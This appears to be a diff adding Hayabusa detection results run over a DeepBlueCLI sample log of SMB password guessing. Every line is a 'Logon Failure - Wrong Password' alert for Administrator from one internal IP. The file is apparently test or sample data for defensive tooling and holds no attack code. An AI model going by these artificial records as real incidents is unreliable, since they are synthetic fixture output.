+2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
